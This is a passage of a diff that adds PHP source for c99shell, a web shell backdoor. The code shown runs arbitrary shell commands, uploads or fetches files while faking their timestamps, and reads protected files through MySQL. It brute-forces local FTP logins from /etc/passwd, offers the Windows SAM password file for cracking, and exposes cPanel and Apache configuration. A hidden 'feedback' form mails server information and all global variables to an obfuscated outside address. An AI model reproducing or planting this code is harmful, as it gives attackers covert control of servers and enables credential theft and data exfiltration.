+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = false;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = ""; 
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));}
+   else {$true = true;}
+   if ($true)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return true;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = false;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    { 
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".$SERVER_NAME." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    } 
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";      
+   $tmp = posix_getpwuid(fileowner($d));
+   if ($tmp["name"] == "") {echo fileowner($d)."/";}
+   else {echo $tmp["name"]."/";}
+   $tmp = posix_getgrgid(filegroup($d));
+   if ($tmp["name"] == "") {echo filegroup($d);}
+   else {echo $tmp["name"];}
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); exit;}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Software:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br><b>Safe-Mode: ".$hsafemode."</b><br><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"security\"><input type=\"hidden\" name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=\"submit\" value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$surl."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1,1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" method=\"POST\"><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urldecode($encoder_input)."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+ }
+ echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = true; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; exit; }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form method=\"POST\"><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=\"hidden\" name=\"rndcode\" value=\"".$rnd."\"><input type=\"text\" name=\"submit\">&nbsp;<input type=\"submit\" value=\"YES\"></form>";
+ }
+}
+if ($act == "feedback")
+{
+ $suppmail = base64_decode("Yzk5c2hlbGxAaW5ib3gucnU=");
+ if (!empty($submit))
+ {
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+ }
+ else {echo "<form method=\"POST\"><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+ echo "<b>Search in file-system:</b><br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = true;
+   $act = "ls";
+  }
+ }
+ echo "<form method=\"POST\">
+<input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><input type=\"hidden\" name=\"act\" value=\"".$dspact."\">
+<b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
+<br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." directories, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = true;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = false; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".htmlspecialchars($surl)."\" method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1,1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\">
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=\"submit\" name=\"submit\" value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = false;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1,1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "ps_aux";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}}
+ echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== false) {$list[] = $d.$o;}
+   closedir($h);
+  }
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["dirs"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
